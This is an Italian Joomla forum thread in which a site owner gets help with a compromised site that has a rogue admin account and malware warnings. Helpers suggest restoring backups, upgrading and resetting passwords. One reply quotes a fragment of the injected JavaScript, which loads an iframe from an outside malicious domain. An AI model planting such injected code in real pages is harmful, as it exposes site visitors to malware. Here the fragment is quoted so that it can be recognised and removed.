Back to top

Autore Topic: [RISOLTO] Errore sicurezza malware + nuovo user per miracolo!  (Letto 9570 volte)

Offline smin

  • Nuovo arrivato
  • *
  • Post: 24
    • Mostra profilo
Salve a tutti, è da circa 20 giorni che il mio sito www.ilcontemax.it ha iniziato a dare problemi!

Non riesco ad entrare nel sito tramite l'area administrator, è silurato come potenzialmente pericoloso visto la presenza di malware e dulcis in fundo sono entrato nel database tramite il programma mysql administrator sono andato a cercare gli user per risistemare le password e... voilà mi sono ritrovato una nuova stringa che vi riporto:

 id:44
Name; 'nekiua',
Username: 'mainaadmin'
email: 'ivan.kachelya@yandex.ru', '
Registrazione: '2013-12-16 18:33:38
Ultima visita: 2013-12-16 19:24:22'

Ho provato a modificare la pass del mio account ma lo stesso non riesco ad entrare in administrator e non riesco a capire il perchè!!!

Qualcuno sa cosa sia successo e cosa posso fare per salvare il sito senza cancellarlo?

Grazie a tutti!
« Ultima modifica: 07 Gen 2014, 12:34:00 da smin »

Offline claudio65

  • Appassionato
  • ***
  • Post: 752
  • Sesso: Maschio
  • Buon forum a tutti
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #1 il: 03 Gen 2014, 06:03:54 »
 Ciao smin,
ho  monitorato il tuo sito con 4 diversi servizi on line e 2 su quattro effettivamente  segnalano la presenza di malware.
La versione Joomla se non sbaglio è la 1.6 quindi  la prima considerazione è quella che necessita di un aggiornarlo alla versione Joomla 2.5.17.
Ma andiamo per ordine, in primo luogo essendo un sito piuttosto maturo immagino e mi auguro che tu possieda un backup del sito e del database.
A questo punto spazzerei via sito e database dal server e reinstallerei una la copia "pulita" del backup di entrambe.
In seconda battuta, vistosi che il tuo sito, mi pare di aver visto, non prevede nel frontend la registrazione degli utenti, andrei ad inibire tale possibilità tramite backend in gestione utenti --> opzioni .
Per completare l'opera e rendere il tuo sito meno vulnerabile procederei con gli aggiornamenti di Joomla per portarlo alla versione 2.5.17.
 
 

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #2 il: 03 Gen 2014, 08:36:39 »
ciao smin,
 siccome io sono meno ottimista (o più realista) di claudio65, immagino che tu un backup aggiornato, ma neanche invecchiato, non ce lo abbia, sbaglio?

nel caso sia come detto sopra: che procedura hai seguito per recuperare la password?
(da db? hai controllato di essere superadmin?)

Nota 1:
il sito non lo puoi, o meglio non lo dovresti, recuperare ma puoi recuperarne i contenuti.

Nota 2:
non servono servizi online, a parte il banning di google, basta arrivare alla home e guardarne il sorgente.

ciao,
marco

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline claudio65

  • Appassionato
  • ***
  • Post: 752
  • Sesso: Maschio
  • Buon forum a tutti
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #3 il: 03 Gen 2014, 08:51:17 »
 Hai ragione Marco, sei più realista, ma un sito del 2012 avrà pure uno straccio di backup?
Bhe considerando che ad oggi il sito è in Joomla 1.6, se tanto mi da tanto direi che è realistico pensare non esista  backup :o
Lo scopriremo solo da smin !!  :)
 

Offline claudio65

  • Appassionato
  • ***
  • Post: 752
  • Sesso: Maschio
  • Buon forum a tutti
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #4 il: 03 Gen 2014, 09:01:21 »
.
« Ultima modifica: 03 Gen 2014, 09:03:17 da claudio65 »

Offline claudio65

  • Appassionato
  • ***
  • Post: 752
  • Sesso: Maschio
  • Buon forum a tutti
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #5 il: 03 Gen 2014, 09:02:33 »
Scusa Marco, scordavo, alla nota due intendi questo Javascript?
Codice: [Seleziona]
function gtkhjasd454hfhf235(){
        create_frame("http://ckidkina.ru/?id=ifrm");
 

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #6 il: 03 Gen 2014, 09:45:17 »
intendo tutto lo script che si trova prima dell'apertura del tag html.

ps: joomla 1.7 è stato rilasciato a luglio 2011, vogliamo scommettere sull'età del sito?

ciao,
marco

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline smin

  • Nuovo arrivato
  • *
  • Post: 24
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #7 il: 03 Gen 2014, 12:53:48 »
Prima di tutto grazie per l'interessamento, ve ne sono grato!!

Il backup... diciamo che ho un copia e incolla del sito, tramite ftp, e che ora sono nel mio hd esterno (però è vecchio di circa 1 anno).

Sono andato di nuovo nel database del sito tramite il programma che ho Mysqladministrator e non mi da più le tabelle del database per andare a controllare i privilegi degli user... ! Cmq ieri nessuno aveva privilegi tranne uno dove c'era scritto "deprecated".

Ho provato a recuperare la password inserendo email e user ma niente non mi è arrivato nulla!

Ultimo aggiornamento, il sito è offline e non riesco ad entrare neanche tramite ftp! mi da accesso negato!
« Ultima modifica: 03 Gen 2014, 13:02:04 da smin »

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #8 il: 03 Gen 2014, 13:47:35 »
1. password
per recuperare la password vedi qui:

www.joomla.it/mediawiki/index.php/Joomla!_2.5:Recupero_password_amministratore

suggerimento: se cambi la pwd e la mail del nuovo utente, quello è molto facile che sia un superadmin.


2. ftp
alcuni provider disabilitano l'ftp e devi essere tu ad attivarlo prima di usarlo. chiedi all'assistenza per questo e/o per reimpostare le pw.


3.sito
io lo vedo on line.

vedi questo e poi vediamo la strategia.

ciao,
marco

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline smin

  • Nuovo arrivato
  • *
  • Post: 24
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #9 il: 03 Gen 2014, 14:27:53 »
Ho scritto all'assistenza e il sito è subito tornato on line...!!

Ora il problema è dato dal fatto che non riesco ad entrare ancora nel pannello administrator del sito ed ho anche modificato le password!
« Ultima modifica: 03 Gen 2014, 14:29:59 da smin »

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #10 il: 03 Gen 2014, 14:44:03 »
ah ecco, quello che avevi scritto prima non lo avevo proprio capito...

lo hai fatto seguendo le indicazioni del link che ti ho mandato? devi usare il 2° Modo: Reset della Password.
su quali utenti hai cambiato la password/email?

ciao,
marco

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #11 il: 03 Gen 2014, 14:48:05 »
dimenticavo: controlla anche che il campo 'block' sia impostato a zero, se è uno l'utente è bloccato e non può accedere.

ciao

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline smin

  • Nuovo arrivato
  • *
  • Post: 24
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #12 il: 03 Gen 2014, 14:50:23 »
ho cambiato username, password ed email a quelli dove in params c'è scritto admin!!

per quanto riguarda il block tutti e tre utenti sono impostati a 0!

Niente non entra in alcun modo nel pannello administrator!!!

Quello script che dicevate l'ho tolto dal file index.php e devo essere sincero si sono tolti alcuni errori di allineamento dei testi all'interno del sito!
« Ultima modifica: 03 Gen 2014, 15:12:47 da smin »

Offline claudio65

  • Appassionato
  • ***
  • Post: 752
  • Sesso: Maschio
  • Buon forum a tutti
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #13 il: 03 Gen 2014, 15:00:17 »
Ok Marco ho visto lo script che indichi  :)

In quanto alla scommessa, deduco che il sito è del 2012 dal fatto che il dominio è stato creato nel ottobre 2012 ma effettivamente la discrepanza temporale delle versioni Joomla sostiene la tua tesi, quindi non amando l'azzardo in nessun caso, tantomeno con chi ha le spalle molto ma molto più larghe delle mie, declino l'invito a scommettere. ;D ;D ;D


Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #14 il: 03 Gen 2014, 15:12:34 »
@smin
non è che hai messo tre utenti con lo username 'admin', vero?

a questo punto dovresti assicurarti che il plugin authentication di joomla sia attivo e che il codice dello stesso non sia stato modificato.

senza accedere al sistema di più non so dirti.

@claudio65
chi non risica non rosica  ;D ;D

ciao

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline smin

  • Nuovo arrivato
  • *
  • Post: 24
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #15 il: 03 Gen 2014, 15:17:43 »
@smin
non è che hai messo tre utenti con lo username 'admin', vero?

a questo punto dovresti assicurarti che il plugin authentication di joomla sia attivo e che il codice dello stesso non sia stato modificato.

senza accedere al sistema di più non so dirti.

@claudio65
chi non risica non rosica  ;D ;D

ciao

Dove vedo se il plugin authentication di joomla è attivo?
Ti ho mandato un mex in PM con un immagine di quello che visualizzo io!
« Ultima modifica: 03 Gen 2014, 15:33:03 da smin »

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #16 il: 03 Gen 2014, 15:35:46 »
nella  tabella #__extensions, name='plg_authentication_joomla'
deve essere
client_id = 0
enabled = 1
access = 1

mi pare, perché stiamo parlando di j1.6, per questo dicevo che a memoria e senza accesso è abbastanza dura...  :(

quanto alla immagine non vedo la pw, ma magari è solo nascosta dalle dimensioni della colonna.


 
mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline smin

  • Nuovo arrivato
  • *
  • Post: 24
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #17 il: 03 Gen 2014, 15:49:22 »
nella  tabella #__extensions, name='plg_authentication_joomla'
deve essere
client_id = 0
enabled = 1
access = 1

Questa stringa che hai scritto non riesco a trovarla nel database!


quanto alla immagine non vedo la pw, ma magari è solo nascosta dalle dimensioni della colonna.

per quanto riguarda la pass l'ho tolta perchè cmq stava su imageshake....

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #18 il: 03 Gen 2014, 17:45:13 »
stiamo parlando di un sistema vecchio e di una versione di transizione, quindi non più in uso da tempo: potrebbe essere che quel plugin si chiamasse in modo diverso, io sinceramente non me lo ricordo.

a parte riprova la modifica della password facendo ben attenzione, non saprei più che dirti.  :(

ciao,
marco

mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline smin

  • Nuovo arrivato
  • *
  • Post: 24
    • Mostra profilo
Re:Errore sicurezza malware + nuovo user per miracolo!
« Risposta #19 il: 05 Gen 2014, 13:56:21 »
niente non va...

 



Web Design Bolzano Kreatif